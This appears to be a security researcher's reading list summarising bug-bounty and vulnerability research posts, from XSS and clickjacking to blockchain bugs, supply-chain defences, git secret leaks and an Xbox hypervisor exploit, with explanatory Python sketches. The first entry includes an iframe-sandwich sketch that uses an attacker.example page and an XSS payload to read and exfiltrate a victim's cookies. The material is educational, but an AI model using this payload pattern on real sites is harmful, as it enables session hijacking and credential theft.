Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Exacerbating Cross-Site Scripting: The Iframe Sandwich - 1646

Cooper Young    Reference → Posted 10 Months Ago
  • In bug bounty, it's not just about finding the vulnerability - it's about exploiting the vulnerability to create as much impact as possible. In the author's situation, they found XSS on a simple static website that wasn't well connected to the rest of the application. This meant that session hijacking, account takeovers, and sensitive API calls were unlikely to work.
  • Their first exploit attempt was adding a login form to the page to trick the user into signing in, stealing the credentials. However, this requires too much interaction, making it a solid medium-severity bug on its own.
  • To add more impact, they created an iFrame sandwich. In most cases, an iFrame cannot access its parent frame's contents. One exception: it can if they're on the same origin, or (in setups like this one) a subdomain of the same site. Since this subdomain was for maps and was shown on the main website, it could access the contents of the page, bypass SOP, use cookies, etc.
  • One question I had was how to get the main page to embed the vulnerable version of our page, since it is reflected XSS. To get around this, the subdomain can be embedded in an attacker-controlled website where they specify the URL. But this alone doesn't mean the top-level site we're trying to get data from is vulnerable.
  • The other trick is getting the parent of the iFrame to have access to the other page. To do this, a careful order of operations is followed:
    1. Attacker website opens up the page to do the exploitation via window.open().
    2. Attacker sets the window.location to be the target page. The parent window of the page opened in step 1 is STILL this window, even though we opened a new page.
    3. The page opened in step 1 contains an iFrame with the exploit payload in it targeting the subdomain page.
    4. The iFrame accesses the parent reference of the page, now on the website we want to exfiltrate data from. Cookies can be shown, the DOM edited... this is super powerful!
  • The end of the article discusses the security team of the product and the security researcher. The researcher's job is to write a powerful and impactful exploit; the researcher bears the burden of proof. To the security team, the PoC is the minimum impact.
  • Unfortunately, the security team deemed this out of scope since the subdomain was out of scope. They fixed the vulnerability, though. Personally, I think if you affect an in-scope item with a vulnerability outside of the scope, you should be rewarded. Attackers do not care about "scope" - they care about impact. Fantastic blog post!
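To make the four steps concrete, here's a minimal sketch of the attacker's two pages built as Python strings. All URLs, the payload, and the exfiltrate() helper are hypothetical placeholders - this is my illustration of the ordering, not the author's actual PoC.

```python
# Toy sketch of the iframe-sandwich page layout described above.
# Every URL and the exfiltrate() helper are hypothetical placeholders.

TARGET = "https://app.example.com/account"                 # page we want data from
VULN_SUBDOMAIN = "https://maps.example.com/?q=PAYLOAD"     # reflected XSS here

# Step 1 + 2: the attacker's top page opens a helper window, then
# navigates *itself* to the target. The helper's opener reference still
# points back at this (now target) window.
ATTACKER_PAGE = f"""
<script>
  window.open('https://attacker.example/helper.html');   // step 1
  window.location = '{TARGET}';                          // step 2
</script>
"""

# Step 3: the helper page frames the vulnerable subdomain with the payload.
HELPER_PAGE = f"""
<iframe src="{VULN_SUBDOMAIN}"></iframe>
"""

# Step 4 runs inside the iframe's injected script: walk the frame
# references up and out until we reach the window now sitting on the
# target, then read it (possible in the article's setup because the XSS
# runs on a subdomain of the same site).
PAYLOAD = """
<script>
  const victim = window.parent.opener;   // step 4: reach the target window
  exfiltrate(victim.document.cookie);    // hypothetical exfil helper
</script>
"""
```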

Scroll Mainnet Emergency Upgrade - 1645

Scroll Security Council    Reference → Posted 10 Months Ago
  • Scroll is a zkEVM blockchain. Recently, they made some changes to the code that led to some pretty serious issues. One was reported by an individual and another through Immunefi by a user named WhiteHatMage.
  • The first bug was a soundness issue in the zkEVM circuit for the auipc opcode. This function used an iterator that skipped the first element. That led to the bits of the PC being range-checked to 8 bits instead of 6 bits. This would have allowed a malicious prover to fill in arbitrary values in the higher 2 bits of the PC, changing the flow of execution.
  • Any ZK soundness issue is bad, but the exploitable impact is unknown. Since the prover and sequencer are operated by Scroll, this is unexploitable in practice, though. The fix for this vulnerability is literally swapping the order of skip(1) and enumerate(). Neat!
  • The second vulnerability was a message spoofing issue on the bridge. For the Euclid phase-2 update, they made some big changes and had a full audit done that did not uncover the issue. From being in a Discord with the author of the bug, I know they had automation set up to notify them of changes to contracts on Scroll. While reviewing the changes, hours after release, they immediately saw the issue.
  • When going from an L1, like Ethereum, to an L2 such as Scroll, there is typically a bridge in between them. Going from the L2 back to the L1, there was an application-level permission issue that had gone unnoticed. On one end of the bridge, there was an authorization check. By crafting a malicious withdrawal from the L2 to the L1, the L1ScrollMessenger entity permission could be abused to make a call back into the main bridge. Since this caller is considered trusted by L2ScrollMessenger, access controls on the L2 could be bypassed, leading to an infinite mint. This was effectively a confused deputy problem.
  • This wasn't exploitable in the past because EnforcedTxGateway did not allow calls from smart contract accounts. With the change to the code, this property no longer held, so it became possible to trigger this path. The explanation is somewhat short and without context, so I don't fully understand the bug. As more details come out, I'll try to update.
  • Overall, two good bugs! The second one led to a 1M payout because of the damage it could have caused; monitoring for the win. The stark difference between the Scroll DoS from last week and this second crazy vulnerability is fascinating.
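The ordering bug behind the first issue is easy to see in a Python analogue of the Rust iterator chain, with itertools.islice standing in for .skip(1) (the bit names here are made up):

```python
from itertools import islice

# The two orderings pair indices with elements differently - exactly the
# kind of off-by-one that turns a 6-bit range check into an 8-bit one.
bits = ["bit0", "bit1", "bit2", "bit3"]

# .skip(1).enumerate(): indices restart at 0 for the *second* element.
skip_then_enumerate = list(enumerate(islice(bits, 1, None)))
# [(0, 'bit1'), (1, 'bit2'), (2, 'bit3')]

# .enumerate().skip(1): the original indices are preserved.
enumerate_then_skip = list(islice(enumerate(bits), 1, None))
# [(1, 'bit1'), (2, 'bit2'), (3, 'bit3')]

# Same elements, different indices - if the index selects the check
# width, one ordering range-checks the wrong width for every element.
assert skip_then_enumerate != enumerate_then_skip
```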

DoubleClickjacking: A New Era of UI Redressing - 1644

Paulos Yibelo    Reference → Posted 10 Months Ago
  • Clickjacking, also known as a UI redress attack, is a mechanism to steal clicks to perform sensitive actions on a website. This is done by iFraming the victim website in the attacker's website and tricking the user into clicking on particular sensitive parts of it. With SameSite: Lax cookies, the framed website becomes unauthenticated, making this much harder to exploit. This article presents a new variant of this called DoubleClickjacking.
  • The main idea is some sleight-of-hand trickery that exploits the small gap between the start of a click and the end of a click across multiple windows. By quickly swapping between pages, it's possible to get a user to click on something in an unintended fashion. The video is the best demonstration of it, but it's very fast. There are some more complications to how this works, though.
    1. The attacker creates an initial webpage. This opens a window.
    2. When the new window opens up, they ask the user to "double click" on it.
    3. Upon loading, the new window changes the parent window's location to the target page. This means the parent window is now sitting on the target page while the top window shows the double-click prompt.
    4. When the user does the double click, the mousedown causes the top window (the current page) to close.
    5. The second click lands on the exposed authorization button on the parent window. With this, access has been granted.
  • The reason this works is the multiple parts of each click. We can use one part of the click and then force the rest to land somewhere else. Any sort of one-click permission can be abused with this, such as OAuth permissions or data sharing on Google Drive. This bypasses traditional clickjacking protections like CSPs. It also isn't just about websites - it can affect Chrome extensions as well.
  • To mitigate this, the author suggests disabling critical buttons unless a gesture is detected on that page. This ensures that the actions were meant for the particular page. For a longer-term solution, a header could be implemented that just resets all gestures. I really like that they thought of a good protection, which many folks wouldn't do.
  • The attack is really cool! I personally don't fully understand why each step happens, but it's interesting nonetheless.
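The steps above can be modeled as a toy Python state machine - a sketch of the event ordering only, not browser code, and the window roles and authorize URL are made up:

```python
# Toy model of the DoubleClickjacking event ordering described above.
# This is a sketch of *why* the ordering matters, not real browser code.

class Window:
    def __init__(self, url):
        self.url, self.closed = url, False

parent = Window("https://attacker.example")        # page that opened the prompt
top = Window("https://attacker.example/prompt")    # shows "double click here!"

# Step 3: while the prompt covers it, the parent window silently
# navigates to the page with the sensitive button.
parent.url = "https://target.example/oauth/authorize"

events = []

def press():
    """One press of the double click (mousedown + the following click)."""
    if not top.closed:
        top.closed = True                          # step 4: mousedown closes the prompt
        events.append(("top", "closed"))
    else:
        events.append(("parent", parent.url))      # step 5: click hits the exposed button

press()   # first half of the double click consumes the prompt window
press()   # second half lands on the authorize button underneath

assert events == [
    ("top", "closed"),
    ("parent", "https://target.example/oauth/authorize"),
]
```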

The Hidden Risks of Cosmos SDK: Unmetered Functions - 1643

Oak Security    Reference → Posted 10 Months Ago
  • Blockchains have a concept known as gas. Like what you put in your car, it measures how far you have gone - the only difference is that this one tracks computational complexity rather than distance on a road. In the Cosmos SDK, a framework for building application-specific blockchains, some of this gas handling becomes complicated and difficult to handle securely.
  • The Cosmos SDK has handlers that run at the beginning and the end of each block - BeginBlock and EndBlock respectively. Since these do not run inside a particular transaction, they have unlimited gas. So, it's essential to be mindful of what gets executed in these functions when building your project.
  • The authors of the post created a Cosmos SDK blockchain locally to test how delays in these functions affected the blockchain's uptime. By adding sleeps at deterministic points within these functions, they noticed some funky things: consensus would commonly time out, and validators would miss voting windows, leading to slashing of stake.
  • A common exploitation method is to increase the number of items being processed in a list. Both of their examples involve processing messages and denoms in a linear list. I wonder about the practicality of exploiting these types of issues, but other ways exist to make these functions spend too much time.
  • They have a few suggestions to work around this. First, try to make all operations O(1). In reality, this isn't always possible. So, having hard upper bounds on iteration counts or run-time limits is the way to go. Another option is having custom gas-metered contexts that will eventually expire. Using custom gas meters has its own consequences, such as forcing rollbacks on the state if the meter trips, because of the potential for partial operations.
  • Overall, a good post on gas meters going wrong in Cosmos.
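A toy Python sketch of the problem and the bounded-iteration mitigation, assuming a made-up gas meter and end-block hook - these names are illustrative, not real Cosmos SDK APIs:

```python
# Toy model of an unmetered EndBlock-style hook. In a normal transaction
# a gas meter aborts runaway work; begin/end-block hooks have no meter,
# so a user-growable list makes block time unbounded. All names here are
# illustrative, not real Cosmos SDK APIs.

class OutOfGas(Exception):
    pass

class GasMeter:
    def __init__(self, limit):
        self.limit, self.used = limit, 0
    def consume(self, amount):
        self.used += amount
        if self.used > self.limit:
            raise OutOfGas()

def process_tx(items, meter):
    for _ in items:
        meter.consume(10)          # every step is metered

def end_block_unmetered(items):
    done = 0
    for _ in items:                # no meter: attacker-sized list = DoS
        done += 1
    return done

def end_block_bounded(items, max_items=100):
    # Mitigation: hard upper bound on iterations per block; leftover
    # items wait for the next block.
    return len(items[:max_items])

attacker_items = list(range(1_000_000))

# A metered path fails fast instead of stalling the chain...
try:
    process_tx(attacker_items, GasMeter(limit=1_000))
    metered_ok = True
except OutOfGas:
    metered_ok = False

assert not metered_ok
# ...the unmetered hook happily does all the work...
assert end_block_unmetered(attacker_items) == 1_000_000
# ...and the bounded hook caps per-block work.
assert end_block_bounded(attacker_items) == 100
```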

Proof of Nothing - 1642

Giuseppe Cocomazzi    Reference → Posted 10 Months Ago
  • The term "proof" is used loosely in the blockchain industry. Originally with Bitcoin, proof of work was used as an anti-spam technique. It relies on the probabilistic assumption that it takes a certain amount of time to find an input whose hash falls below a target. Hashes are sufficiently random, so this is fairly reasonable: based on all previous data, there's no reason it won't keep working in the future. That makes the argument more inductive than deductive.
  • Proof of Stake was popularized by Tendermint. "Proof" relies on a supermajority of validators (two-thirds of voting power) cryptographically signing each block. With proof of stake, the current block is grounded in the previous one, making the blocks sequential with respect to each other. Although the name implies some mathematical deduction, this is NOT a regular proof.
  • Light clients follow the same logic, except they start from a trusted block that is provided when the light client is initialized. Additionally, they can skip blocks with "non-adjacent block verification", assuming that 2/3 of the voting power from the most recent trusted block has signed the new block. Giuseppe doesn't like this. Why?
  • Two large inductive leaps are being made:
    • Any validator holding 1/3+ of the voting power at block height H continues to behave honestly for N blocks.
    • The validator from the first point is no longer trusted at H+N.
  • Because the validator is trusted from height H for N blocks, if they decide to be malicious during that period, their proof is still technically valid! It doesn't matter that they were slashed on the main chain; it's still valid from the perspective of the light client. Given this argument, the consequences of not having perfectly sequential block validation are not great. But, to my knowledge, no hacks exploiting this have happened yet.
  • According to the author, skipping verification for non-adjacent blocks "might very well be named 'Proof of Faith' or, better, 'Proof of Nothing'". Interesting post around the design of Tendermint light client verification!
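The probabilistic preimage-style search behind proof of work fits in a few lines of Python - finding the nonce takes many hashes on average, while checking it takes one:

```python
import hashlib

# Minimal proof-of-work sketch: search for a nonce whose hash falls
# below a target. The "proof" is the inductive claim that nobody can do
# this meaningfully faster than brute force.

def solve(data: bytes, difficulty_bits: int) -> int:
    target = 1 << (256 - difficulty_bits)
    nonce = 0
    while True:
        digest = hashlib.sha256(data + nonce.to_bytes(8, "big")).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce              # expected ~2**difficulty_bits tries
        nonce += 1

def verify(data: bytes, nonce: int, difficulty_bits: int) -> bool:
    digest = hashlib.sha256(data + nonce.to_bytes(8, "big")).digest()
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))

# ~4096 hashes expected to find; exactly one hash to verify.
nonce = solve(b"block header", 12)
assert verify(b"block header", nonce, 12)
```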

Scroll Chain DoS via CCC Overflows in Single User Transactions + Drama - 1641

Pavel Shabarkin    Reference → Posted 10 Months Ago
  • In Scroll zkEVM rollups, transactions occur in two main steps:
    1. EVM executes all transactions, performs state transitions and then sends the transaction to the provers.
    2. zkEVM prover proves the traces.

    This second step is known for being time consuming. Due to this, there is a limited capacity: Scroll imposes a row consumption limit on the transactions in a block, and rejects and reorgs before finalizing if it is exceeded.
  • If transaction traces exceed the row capacity, the zk prover will fail. Obviously, an unprovable block prevents the chain from finalizing and wastes resources. Scroll knew this and implemented the Circuit Capacity Checker (CCC) in l2-geth to validate transactions before they enter the zkEVM circuit. Wow! We're looking at remediations within remediations for bugs, crazy!
  • The mining process is as follows:
    1. Transactions enter the mempool, where they're picked up by a worker.
    2. Transactions are processed based upon gas price.
    3. Each transaction is executed one by one.
    4. Commit the block. If the CCC calculations failed, then roll back the block.
  • The CCC functions as a post-sealing check rather than a pre-sealing check. This enables an attacker to send a lot of malicious transactions that exceed the CCC limit but are totally valid otherwise. This means that a lot of computations are done (wasting time and resources) only for a reorg to happen.
  • The cool part is that since there's a reorg, there's no gas cost to the attacker! So, they can create an endless stream of high gas price transactions to always be at the front of the queue and permanently stall the blockchain. Technically, it's interesting how they abused the issue.
  • Now... for the drama. The vulnerability was reported to Scroll who decided not to fix the issue. They had received multiple similar types of vulnerabilities in CCC and understood there were likely more. So, they had completely redesigned the feature but were just waiting until the next release to upgrade it.
  • Scroll and Immunefi agreed the vulnerability was legit. For the time being, Scroll was okay accepting this risk for the users and moving on, though. Because nothing was changed, no bug payout. The author of the report published the report on Twitter and a blog-like website, including full Immunefi chat logs. Some folks believe that the whitehat is in the right, while others think they are in the wrong. It's a sticky situation.
  • From the perspective of the bug hunter, I get it - there's a live vuln and a program you did research on. From the perspective of the project, I get it - you recognized a design weakness and already fixed it. In my opinion, there's nothing on the Scroll side to do besides push their new code. So, if they're okay with the risk they're taking on with a DoS until the upgrade, that's their decision to make.
  • When pushing for remediation on a bug bounty report, we've got to be patient. Reading the communications, the bug hunter was pushing for comms faster than the SLA of Immunefi required and was very aggressive about it. Additionally, after being offered a bounty of 1K, they pushed back and asked for a bounty of 200-300K. They even pushed up the severity of the bug, citing the primacy of impact and inventing reasons why the DoS was so bad.
  • Personally, I feel like the denial-of-service risk commonly cited on projects gets more credit than it should. Realistically, if this attack were launched, the chain would be back up in less than a day with a hacky solution for the issue. The numbers and impact the author cites for "Token Sell-Off & Investor Confidence Crisis" are a little ridiculous to me. Sure, a DoS on the chain has impact, but not 200K-bug-bounty worth of impact. Besides my grievances with how it was handled, the blog post is very thorough and well-explained.
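The post-sealing ordering problem can be sketched as a toy block builder in Python. Real Scroll internals differ; the point is only why check-after-execute wastes the node's work while refunding the attacker (all names and numbers here are made up):

```python
# Toy model of a post-sealing capacity check: work happens *before* the
# check, and a failed check reorgs the block away, refunding fees.
# Illustrative only - not Scroll's actual l2-geth logic.

ROW_LIMIT = 1_000   # hypothetical circuit row capacity per block

def build_block(txs):
    rows, fees_collected = 0, 0
    for tx in txs:
        rows += tx["rows"]               # execution work done up front
        fees_collected += tx["fee"]
    # Post-seal CCC: only now do we learn the block is unprovable.
    if rows > ROW_LIMIT:
        return {"committed": False, "wasted_work": rows, "attacker_cost": 0}
    return {"committed": True, "wasted_work": 0, "attacker_cost": fees_collected}

# Attacker floods the pool with individually-valid, high-fee txs whose
# combined traces blow past the row capacity.
spam = [{"fee": 100, "rows": 600} for _ in range(3)]
result = build_block(spam)

assert result["committed"] is False      # block reorged away
assert result["wasted_work"] == 1_800    # node paid the execution cost
assert result["attacker_cost"] == 0      # attacker's gas refunded by the reorg
```

A pre-sealing check (reject each transaction before executing the whole block) removes the free-spam property, which is roughly what a redesigned CCC has to guarantee.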

How Go Mitigates Supply Chain Attacks - 1640

Filippo Valsorda - Golang    Reference → Posted 10 Months Ago
  • Most modern software has a large amount of open-source code. Because the code is constantly used and downloaded, it opens up the potential for supply chain attacks. Despite good process and technical chops, every dependency is an unavoidable trust relationship. This article discusses how Golang tries to mitigate these risks with very explicit design decisions.
  • In Golang, all builds are locked. The version of every dependency is set in the go.mod file. Only explicit updates to this file can change the dependencies, such as go get or go mod tidy. This is super important for security - the code in the repository should be the source of truth and nothing else.
  • There is no concept of "latest" for dependencies. This prevents a compromised dependency from backdooring all of its users very quickly. Everything said above is also transitive for dependencies of dependencies. If a dependency is compromised, picking it up requires a specific update, giving folks time to see what's going on.
  • Version contents are guaranteed to never change - module versions are immutable. This property ensures that an existing package cannot be modified to compromise code that depends on it. So, if something is safe to run currently, we can be confident it will stay safe to run. A lot of cryptographic verification goes into this.
  • Another issue that I have with NPM is hooks and builds running code. Golang has no post-install hooks, and the built code cannot do anything until it is actually run. In all likelihood, if you installed something, you're probably going to run it, but this does add another security boundary.
  • Overall, a good look into supply chain security in Golang. I like to see that the developers put a lot of thought into the package manager of Golang.
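The pin-and-verify property can be sketched in a few lines of Python, in the spirit of go.mod + go.sum (this is not Go tooling, just the idea; module names and contents are made up):

```python
import hashlib

# Toy lockfile: each dependency is pinned to an exact version AND a hash
# of its contents, so neither a new "latest" nor a silently re-published
# version can slip into a build. Illustrative, not Go's actual format.

lockfile = {
    # (module, version): sha256 of the module archive recorded at pin time
    ("example.com/left-pad", "v1.2.3"):
        hashlib.sha256(b"left-pad v1.2.3 contents").hexdigest(),
}

def verify_download(module, version, archive: bytes) -> bool:
    pinned = lockfile.get((module, version))
    if pinned is None:
        return False                     # not pinned: never fetched implicitly
    return hashlib.sha256(archive).hexdigest() == pinned

# The exact bytes recorded at pin time verify...
assert verify_download("example.com/left-pad", "v1.2.3",
                       b"left-pad v1.2.3 contents")
# ...a re-published (tampered) archive for the same version does not...
assert not verify_download("example.com/left-pad", "v1.2.3",
                           b"left-pad v1.2.3 contents + backdoor")
# ...and an unpinned "latest" is rejected outright.
assert not verify_download("example.com/left-pad", "v9.9.9", b"whatever")
```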

How I made $64k from deleted files — a bug bounty story - 1639

Sharon Brizinov    Reference → Posted 10 Months Ago
  • git is a distributed version control system used everywhere. Under the hood, the entire history of the repository is tracked. Git has blobs for the files, trees for the directory structure, and commits for snapshot information. A blob is a binary large object that is stored under the SHA-1 hash of its contents (SHA-256 in newer repositories) and is zlib compressed. Many of these are compressed into a single file called a pack; objects no longer referenced by other objects are dangling.
  • A commit represents a snapshot of the repository at a point in time. It stores a reference to a tree object, pointers to parent commits, and metadata.
  • When a file is removed via git rm, it can still be accessed because the history is immutable. The data of a commit is stored forever in the .git/objects folder. Additionally, the pack files contain information that is no longer reachable by normal means.
  • The author wanted to target all dangling objects by traversing commits along with their parent commits. If a file was dangling and deleted, they dumped it to disk. From there, they would run the tool TruffleHog to check the repo for secrets. TruffleHog supports over 800 different secret formats! It also has a verification flag that will check whether a secret is still valid.
  • My main question, which they cover, is why not just use TruffleHog from the beginning? It will often skip .pack files if they are too big. By uncompressing these ourselves with the mechanism from above, TruffleHog can do its magic like normal.
  • They scanned a crazy number of projects doing this. They found the organization names by looking at various GitHub repos with names, using the GitHub search, and directly taking repos with over 5000 stars. All in all, they made 64K off of this research. This goes to show that novel research pays. There were a large number of false positives; in particular, dummy users for testing and canaries were very common.
  • Why does this happen so much? The author claims that many developers just don't understand how git works with regard to deleting files. Additionally, bad .gitignore hygiene around .env and binary files was common as well. Overall, great research!
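The blob storage described above is simple enough to reproduce in Python: git hashes the header "blob <size>\0" plus the contents, names the object by that hash, and zlib-compresses it on disk.

```python
import hashlib
import zlib

# How git stores a file: the object is b"blob <size>\0<contents>", named
# by the SHA-1 of header+body (SHA-256 in newer repositories), and
# zlib-compressed under .git/objects/<2 hex chars>/<remaining 38>.

def git_blob(contents: bytes):
    store = b"blob %d\x00%b" % (len(contents), contents)
    oid = hashlib.sha1(store).hexdigest()
    path = f".git/objects/{oid[:2]}/{oid[2:]}"
    return oid, path, zlib.compress(store)

oid, path, packed = git_blob(b"test content\n")
# Matches `echo 'test content' | git hash-object --stdin`:
assert oid == "d670460b4b4aece5915caf5c68d12f560a9fe3e4"
assert path == ".git/objects/d6/70460b4b4aece5915caf5c68d12f560a9fe3e4"
# Deleting the file later doesn't touch this object - which is exactly
# what the author's dangling-object scan recovers.
assert zlib.decompress(packed) == b"blob 13\x00test content\n"
```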

Hacking the Xbox 360 Hypervisor Part 2: The Bad Update Exploit - 1638

Grimdoomer    Reference → Posted 10 Months Ago
  • The author of this post was hunting for vulnerabilities in the Xbox 360 hypervisor. While doing this, they noticed the system call HvxKeysExecute, which allowed running small pieces of ad-hoc code signed by Microsoft in hypervisor mode. They pulled down 25 of these payloads and found a vulnerability in one of them: Bad Update.
  • The Bootloader Update Payload for HvxKeysExecute is the one being attacked. It reads data from kernel mode and performs LZX decompression on it. This requires a scratch buffer to store a data structure with lots of interesting pointers to jump tables and such. This buffer is located in encrypted memory but NOT protected memory. The idea is to overwrite one of these pointers to hijack the control flow later on.
  • Encrypted memory is a section of memory on the XBox that is in the Hypervisor but modifiable by the kernel. Because of this, it's typically only used in a write-only fashion. In the vulnerability above, we want to modify pointers that are encrypted and used by the Hypervisor. The encryption of this memory uses a per-boot key and a 10-bit whitening value that is unique to the address and cache line. This prevents simple oracles or reuse across resets/reboots.
  • There's still wiggle room for an oracle here: we need a way to encrypt chosen data and a way to recover the whitening value for the target address. Luckily, an encryption oracle is built into the Hypervisor with the HvxEncrypted set of APIs. For the whitening value, we need a known value somewhere in the contents that we can compare against. This means we have a complete oracle!
  • Encrypting arbitrary data with a matching whitening value allows one to edit the encrypted memory. First, they tried editing the malloc and free pointers - this didn't work because of cache-line issues. Instead, they overwrote the dec_output_buffer pointer (the output of the decompression process) to get a controlled write to another unintended location. This gives a 0x8000-byte write primitive with uncontrolled data into the Hypervisor.
  • To turn this into code execution, they had to win a race condition and be able to trigger it multiple times - the second of these made it much more difficult in practice, since it removed many interesting targets. Within one of the writable bootloader code segments, they found a stb/blr pair that gave them an arbitrary write primitive that could be executed at the end of a system call within the Hypervisor.
  • This is inherently racy and wasn't very consistent. When the race condition is combined with the brute force of the whitening value, the exploit takes too long. To make this more consistent, they experimented with thread prioritization and monitoring of the code. With their initial payload, by the time the attack thread got the malicious ciphertext flushed to RAM, the XKE payload was already done running. To fix this, they put the attack on hardware thread 0 and the payload on hardware thread 1, with both on core 0. There are more details on winning the race, but they're over my head.
  • This exploit is still inconsistent and time-consuming. However, the means of winning the race more often and modifying encrypted memory are still good insights into complex exploit development. The testing strategies used were also interesting to me. Good work!

Choosing an Audit Competition: How to Spot Snake Oil - 1637

Zellic    Reference → Posted 10 Months Ago
  • Contest platforms in web3 are an alternative to standard security reviews. The auditing firm Zellic bought the contest platform Code4rena (C4) last year and has decided to write a report on metrics for audit contest information. Naturally, the platform wants to look better, but you've got to know when things are snake-oily. Imo, some of this just feels like competitor bashing (especially the screenshots, where it's obvious who they're calling out), but there are some good points.
  • The true benefit of audit competitions is the number of eyes and skills your code gets. A traditional audit is a low-hanging-fruit audit with known entities. In a contest, the participants are incentivized to find unique and high-impact issues. So, the coverage is better theoretically.
  • The first metric is finding count. Many findings reports include invalid issues or don't de-duplicate the issues, inflating the numbers. Teams only care about the high- and medium-severity bugs.
  • The next metric is participant numbers. There's a difference between participants and useful participants. Using a number with "participants who submitted a valid finding" would be much better. It's also hard to know how much time was actually spent on the code for those participants. However, this final point is true on all platforms.
  • The third one is "Claims about exclusivity". A general issue with contests is how you know good researchers are looking at your code. At Cantina, they have pre-paid folks to work on audits. On Sherlock, they have a Lead Watson who gets an automatic part of the prize pool.
  • Having full-time people on your platform is better than not having them at all. There's a concern about whether these folks actually spend the time on your project; if they didn't, they would probably lose their contract with the contest platform. The concerns are valid (are they on it the entire time, who is managing this, etc.), but some of this is better than the none that C4 offers.
  • Comparisons between audit contests and traditional audits are usually somewhat confusing. Severity scales are different, "fake" vulnerabilities are sometimes presented in both cases, and asymmetric comparisons are made on codebases that are either different projects or audited at different points. This is a fair call out.
  • It's good to consider the differences between the platforms when deciding where to host competitions and where to participate as a hacker. This article has some good points but also a very skewed perspective, with Zellic A) being an auditing firm and B) owning C4. So, take the content with a grain of salt.